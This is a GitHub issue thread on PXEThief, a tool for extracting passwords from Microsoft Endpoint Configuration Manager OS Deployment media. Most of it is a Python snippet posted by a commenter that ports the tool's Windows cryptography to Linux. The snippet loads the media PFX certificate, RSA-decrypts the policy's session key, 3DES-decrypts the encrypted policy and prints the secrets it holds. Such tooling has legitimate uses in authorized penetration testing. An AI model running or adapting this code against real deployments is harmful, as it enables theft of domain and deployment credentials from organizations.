search

MWR-CyberSec / PXEThief

PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager
GNU General Public License v3.0
324 stars 47 forks source link

Tool is Windows only #6

Open blurbdust opened 4 months ago

blurbdust commented 4 months ago

;)

from certipy.lib.certificate import load_pfx
from cryptography.hazmat.primitives.asymmetric import padding
from asn1crypto import cms
from Crypto.Cipher import PKCS1_OAEP, AES, DES3
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import unpad
import binascii
import hexdump
def decrypt_triple_des(key, iv, ciphertext):
        cipher = DES3.new(key, DES3.MODE_CBC, iv)
        plaintext = cipher.decrypt(ciphertext)
        try:
                plaintext = unpad(plaintext, DES3.block_size)
        except ValueError:
                raise ValueError("Incorrect padding.")
        return plaintext

with open("_SMSTSMediaPFX.pfx", "rb") as f:
        pfx, cert = load_pfx(f.read(), b"PASSWORD")
        with open("pol.xml", "rb") as g:
                asn1bytes = g.read()
                info = cms.ContentInfo.load(asn1bytes)
                digested_data = info['content']
                if digested_data['recipient_infos'].native[0]['key_encryption_algorithm']['algorithm'] != 'rsaes_pkcs1v15':
                        algo = digested_data['recipient_infos'].native[0]['key_encryption_algorithm']['algorithm']
                        print("{algo} not implemented yet")
                session_key = digested_data['recipient_infos'].native[0]['encrypted_key']
                key = pfx.decrypt(session_key, padding.PKCS1v15())
                if digested_data['encrypted_content_info']['content_encryption_algorithm']['algorithm'].native != 'tripledes_3key':
                        algo = digested_data['encrypted_content_info']['content_encryption_algorithm']['algorithm'].native
                        print("{algo} not implemented yet")
                iv = digested_data['encrypted_content_info']['content_encryption_algorithm']['parameters'].native
                ciphertext = digested_data['encrypted_content_info']['encrypted_content'].native
                decrypted_data = decrypt_triple_des(key, iv, ciphertext)
                print(decrypted_data.decode('utf-16le'))
LukeLauterbach commented 3 months ago

From the ReadMe:

Linux support - PXEThief currently makes use of pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux

blurbdust commented 3 months ago

I apologize, I meant to follow up with a PR with these fixes added sooner. The code above is the reimplementation of the Windows specific cryptographic functions purely in Python.

blurbdust commented 3 months ago

pfx, cert = load_pfx(f.read(), b"PASSWORD") is the replacement for https://github.com/MWR-CyberSec/PXEThief/blob/main/pxethief.py#L484

Virtually everything else is the replacement for https://github.com/MWR-CyberSec/PXEThief/blob/main/pxethief.py#L541